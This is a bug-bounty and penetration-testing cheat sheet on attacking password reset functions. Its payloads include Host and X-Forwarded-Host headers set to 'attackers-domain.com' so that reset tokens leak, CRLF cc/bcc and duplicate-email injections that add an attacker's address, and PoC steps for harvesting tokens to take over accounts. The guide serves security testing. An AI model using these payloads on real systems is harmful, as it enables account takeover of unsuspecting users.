• Header Poisoning
  • Host: Header Injection Password Reset URL
    • Potential Vulnerable Headers
      • Host Header Password Reset
      • Double Host Header
      • X-Forwarded-Host Header
    • Confirm Vulnerable
    • PoC
• Password Reset Token Filter Bypass
• Email Parameter Manipulation
  • Password Change Functions
    • Intercept & Change the Email
  • Password Reset Functons
    • Add Second Email
• Password Token Referral Header Leak
• Check List

The following document outlines some key techniques used when assessing password reset function on modern web application and API’s, a useful resource for bug bounty hunters and penetration testers when performing password reset security testing.

Header Poisoning

Host: Header Injection Password Reset URL

The following headers can be modified in an attempt to modify the password reset token URL to an attacker controlled domain. Potentially allowing an attacker to obtain the reset token when a user clicks the link to perform a password reset.

Potential Vulnerable Headers

Host Header Password Reset

Replace the Host: header with a server you control.

 
Host: attackers-domain.com

Double Host Header

Often when you modify the Host header the application, or WAF fails to the process the request, a technique which can potentially bypass this filter if to simply add a second Host header to the request.

Host: target.com
Host: attackers-domain.com

X-Forwarded-Host Header

Add an attacker controlled domain in the X-forwarded-Host header directive.

Host: target.com 
X-Forwarded-Host: attackers-domain.com

Confirm Vulnerable

1. Perform a password reset normally, and modify the host header with a different url
2. Check the email sent by the application has the test url, not the applications url

PoC

1. Replace vulnerable header with the attacker controlled domain
2. Send the request
3. Wait for the victim to click reset link (or show PoC to a second account)
4. Exatract the token from the webserver logs you control
5. Use the extracted token to take over the user account

Password Reset Token Filter Bypass

If the app is built on ruby, try adding a .json extension to the end of the password reset URL. In certain circumstances ACL bugs may exist, adding the extension could potentially bypass any additional layers of protection the application has in in place.

1. Add a .json to the reset token
2. Observe the applications response to see if the

Email Parameter Manipulation

Password Change Functions

Intercept & Change the Email

1. Interecept the request, and replace the email address to one that you control

Password Reset Functons

Add Second Email

Vulnerable applications can be manipulated to send password reset codes to multiple email addresses.

1. Interecept the request, and add a second email address to the request

&
%20
|
%0a%0dcc:
%0a%0dbcc:

Modify the parameter matching the applications format, example:

 
email="victim@mail.tld",email="attacker@mail.tld"

Match the API Request Schema

Match the application / API's request formatting when adding the additional email address.

Password Token Referral Header Leak

Vulnerable applications leak the password reset URL via the referal header.

Assess the target using an intercepting proxy to identify if the referral header leaks the token through the referral header.

Check List

• Host Header Injection Password Reset Function
• Double Host Header Injection Password Reset Function
• X-Forwarded-Host Header Injection Password Reset Function
• Email Parameter Manipulation add attacker controller second email address

Enjoy.